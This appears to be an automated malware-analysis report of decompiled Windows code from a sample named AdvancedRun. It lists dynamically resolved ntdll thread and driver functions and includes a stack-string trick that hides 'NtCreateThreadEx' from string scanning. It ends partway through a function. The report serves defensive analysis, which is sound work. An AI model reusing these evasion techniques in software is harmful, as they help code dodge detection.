                                                                                                                                                                                                                          0x0040110a
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110e
                                                                                                                                                                                                                          0x00401115
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401303

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                          • String ID: AdvancedRun
                                                                                                                                                                                                                          • API String ID: 829165378-481304740
                                                                                                                                                                                                                          • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408E31() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t2;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x41c4ac == 0) {
                                                                                                                                                                                                                          					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                                                                                                                          					 *0x41c4ac = _t2;
                                                                                                                                                                                                                          					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                                                                                                                          					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                                                                                                                          					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                                                                                                                          					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                                                                                                                          					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                                                                                                                          					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                                                                                                                          					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                                                                                                                          					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                                                                                                                          					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                                                                                                                          					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                                                                                                                          					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                                                                                                                          					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                                                                                                                          					 *0x41c4a8 = _t14;
                                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                                                                                                                          				void _v259;
                                                                                                                                                                                                                          				void _v260;
                                                                                                                                                                                                                          				void _v515;
                                                                                                                                                                                                                          				void _v516;
                                                                                                                                                                                                                          				char _v1048;
                                                                                                                                                                                                                          				void _v1052;
                                                                                                                                                                                                                          				void _v1056;
                                                                                                                                                                                                                          				void _v1560;
                                                                                                                                                                                                                          				long _v1580;
                                                                                                                                                                                                                          				void _v3626;
                                                                                                                                                                                                                          				char _v3628;
                                                                                                                                                                                                                          				void _v5674;
                                                                                                                                                                                                                          				char _v5676;
                                                                                                                                                                                                                          				void _v9770;
                                                                                                                                                                                                                          				short _v9772;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                                          				int _t64;
                                                                                                                                                                                                                          				long _t68;
                                                                                                                                                                                                                          				struct HWND__* _t94;
                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                          				intOrPtr _t127;
                                                                                                                                                                                                                          				unsigned int _t130;
                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2628, __ecx);
                                                                                                                                                                                                                          				_t45 = _a8 - 0x110;
                                                                                                                                                                                                                          				if(_t45 == 0) {
                                                                                                                                                                                                                          					E00404DA9(__edx, _a4, 4);
                                                                                                                                                                                                                          					_v9772 = 0;
                                                                                                                                                                                                                          					memset( &_v9770, 0, 0xffe);
                                                                                                                                                                                                                          					_t103 = 5;
                                                                                                                                                                                                                          					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                                                                                                                          					memset( &_v1560, 0, 0x1f6);
                                                                                                                                                                                                                          					_v260 = 0;
                                                                                                                                                                                                                          					memset( &_v259, 0, 0xff);
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v515, 0, 0xff);
                                                                                                                                                                                                                          					_v5676 = 0;
                                                                                                                                                                                                                          					memset( &_v5674, 0, 0x7fe);
                                                                                                                                                                                                                          					_v3628 = 0;
                                                                                                                                                                                                                          					memset( &_v3626, 0, 0x7fe);
                                                                                                                                                                                                                          					_t135 = _t132 + 0x5c;
                                                                                                                                                                                                                          					_t60 = GetCurrentProcess();
                                                                                                                                                                                                                          					_t105 =  &_v260;
                                                                                                                                                                                                                          					_a8 = _t60;
                                                                                                                                                                                                                          					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                                                                                                                          					__eflags = _t61;
                                                                                                                                                                                                                          					if(_t61 != 0) {
                                                                                                                                                                                                                          						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                                                                                                                          						_pop(_t105);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                                                                                                                          					__eflags = _t63;
                                                                                                                                                                                                                          					if(_t63 != 0) {
                                                                                                                                                                                                                          						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                                                                                                                          						_pop(_t105);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t64 = E00404BD3();
                                                                                                                                                                                                                          					__eflags = _t64;
                                                                                                                                                                                                                          					if(_t64 == 0) {
                                                                                                                                                                                                                          						E004090EE();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00409172();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags =  *0x4101b8;
                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                                          						_v1056 = 0;
                                                                                                                                                                                                                          						memset( &_v1052, 0, 0x218);
                                                                                                                                                                                                                          						_t127 =  *0x40f5d4; // 0x0
                                                                                                                                                                                                                          						_t135 = _t135 + 0xc;
                                                                                                                                                                                                                          						_t68 = GetCurrentProcessId();
                                                                                                                                                                                                                          						_push(_t127);
                                                                                                                                                                                                                          						_push(_t68);
                                                                                                                                                                                                                          						 *0x40f84c = 0;
                                                                                                                                                                                                                          						E004092F0(_t105, __eflags);
                                                                                                                                                                                                                          						__eflags =  *0x40f84c; // 0x0
                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                          							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                                                                                                                          							_t135 = _t135 + 0xc;
                                                                                                                                                                                                                          							__eflags =  *0x40f84c; // 0x0
                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                          								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						__eflags =  *0x4101bc;
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                                          							_push( &_v3628);
                                                                                                                                                                                                                          							_push( &_v5676);
                                                                                                                                                                                                                          							_push( *0x40f3b0);
                                                                                                                                                                                                                          							_push( *0x40f3bc);
                                                                                                                                                                                                                          							_push( *0x40f3ac);
                                                                                                                                                                                                                          							_push( *0x40f394);
                                                                                                                                                                                                                          							_push( *0x40f398);
                                                                                                                                                                                                                          							_push( *0x40f3a0);
                                                                                                                                                                                                                          							_push( *0x40f3a4);
                                                                                                                                                                                                                          							_push( *0x40f39c);
                                                                                                                                                                                                                          							_push( *0x40f3a8);
                                                                                                                                                                                                                          							_push( &_v1580);
                                                                                                                                                                                                                          							_push( *0x40f5d4);
                                                                                                                                                                                                                          							_push( *0x40f5c8);
                                                                                                                                                                                                                          							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                                                                                                                          							_push(0x800);
                                                                                                                                                                                                                          							_push( &_v9772);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                                                                                                                          							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_t45 == 1) {
                                                                                                                                                                                                                          					_t130 = _a12;
                                                                                                                                                                                                                          					if(_t130 >> 0x10 == 0) {
                                                                                                                                                                                                                          						if(_t130 == 3) {
                                                                                                                                                                                                                          							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                                                                                                                          							_a4 = _t94;
                                                                                                                                                                                                                          							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                                                                                                                          							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                                                                                                                          							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				goto L21;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                                                                                                                          • {Unknown}, xrefs: 00408BA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                          • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                          				char _v572;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                          				signed short* _t76;
                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                          				intOrPtr* _t96;
                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t96 = __edi;
                                                                                                                                                                                                                          				_t97 = 0;
                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                          				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                                                                                                                          				_v8 = _t47;
                                                                                                                                                                                                                          				if(_t47 > 0) {
                                                                                                                                                                                                                          					_t50 = E00405AA7(__edi);
                                                                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					_t84 = _t50;
                                                                                                                                                                                                                          					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                                                                                                                          					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                                                                                                                          						_t81 = _v12;
                                                                                                                                                                                                                          						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                                                                                                                          						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                                                                                                                          						 *__edi =  *_t13;
                                                                                                                                                                                                                          						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                                                                                                                          						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                                                                                                                          						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                                                                                                                          						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                                                                                                                          						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                          						wcscpy( &_v60, L"040904E4");
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t76 = _v16;
                                                                                                                                                                                                                          						_push(_t76[1] & 0x0000ffff);
                                                                                                                                                                                                                          						_push( *_t76 & 0x0000ffff);
                                                                                                                                                                                                                          						_push(L"%4.4X%4.4X");
                                                                                                                                                                                                                          						_push(0x14);
                                                                                                                                                                                                                          						_push( &_v60);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                                                                                                                          					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                                                                                                                          					_push(_t84);
                                                                                                                                                                                                                          					_t97 = 1;
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t97;
                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                          • API String ID: 1223191525-1542517562
                                                                                                                                                                                                                          • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                          				char _v10;
                                                                                                                                                                                                                          				char _v11;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				char _v13;
                                                                                                                                                                                                                          				char _v14;
                                                                                                                                                                                                                          				char _v15;
                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                          				char _v17;
                                                                                                                                                                                                                          				char _v18;
                                                                                                                                                                                                                          				char _v19;
                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                          				char _v21;
                                                                                                                                                                                                                          				char _v22;
                                                                                                                                                                                                                          				char _v23;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *__esi != 0) {
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                                                                                                                          				 *__esi = _t27;
                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					asm("stosw");
                                                                                                                                                                                                                          					asm("stosb");
                                                                                                                                                                                                                          					_v24 = 0x4e;
                                                                                                                                                                                                                          					_v23 = 0x74;
                                                                                                                                                                                                                          					_v13 = 0x65;
                                                                                                                                                                                                                          					_v12 = 0x61;
                                                                                                                                                                                                                          					_v18 = 0x74;
                                                                                                                                                                                                                          					_v17 = 0x65;
                                                                                                                                                                                                                          					_v22 = 0x43;
                                                                                                                                                                                                                          					_v14 = 0x72;
                                                                                                                                                                                                                          					_v11 = 0x64;
                                                                                                                                                                                                                          					_v21 = 0x72;
                                                                                                                                                                                                                          					_v10 = 0x45;
                                                                                                                                                                                                                          					_v9 = 0x78;
                                                                                                                                                                                                                          					_v20 = 0x65;
                                                                                                                                                                                                                          					_v19 = 0x61;
                                                                                                                                                                                                                          					_v16 = 0x54;
                                                                                                                                                                                                                          					_v15 = 0x68;
                                                                                                                                                                                                                          					_v8 = 0;
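                                                                                                                                                                                                                          					// Stack string: the byte stores above, read in order _v24.._v9, spell "NtCreateThreadEx" (_v8 is the NUL terminator),
                                                                                                                                                                                                                          					// so the export name never appears as a contiguous string in the binary before it is resolved from ntdll.dll.
                                                                                                                                                                                                                          					__esi[1] = GetProcAddress(_t27,  &_v24);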
                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                                                                                                                          • API String ID: 2574300362-1257427173
                                                                                                                                                                                                                          • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                          			E00407F8D(void* __eax) {
                                                                                                                                                                                                                          				struct _SHFILEINFOW _v692;
                                                                                                                                                                                                                          				void _v1214;
                                                                                                                                                                                                                          				short _v1216;
                                                                                                                                                                                                                          				void* _v1244;
                                                                                                                                                                                                                          				void* _v1248;
                                                                                                                                                                                                                          				void* _v1252;
                                                                                                                                                                                                                          				void* _v1256;
                                                                                                                                                                                                                          				void* _v1268;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          				long _t38;
                                                                                                                                                                                                                          				long _t46;
                                                                                                                                                                                                                          				long _t48;
                                                                                                                                                                                                                          				long _t58;
                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                          				intOrPtr* _t64;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t64 = ImageList_Create;
                                                                                                                                                                                                                          				_t62 = __eax;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                                                                                                                          					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                                                                                                                          						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                                                                          						 *(_t62 + 0x2a8) = _t48;
                                                                                                                                                                                                                          						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                                                                                                                          						_push( *(_t62 + 0x2a8));
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v692.hIcon = 0;
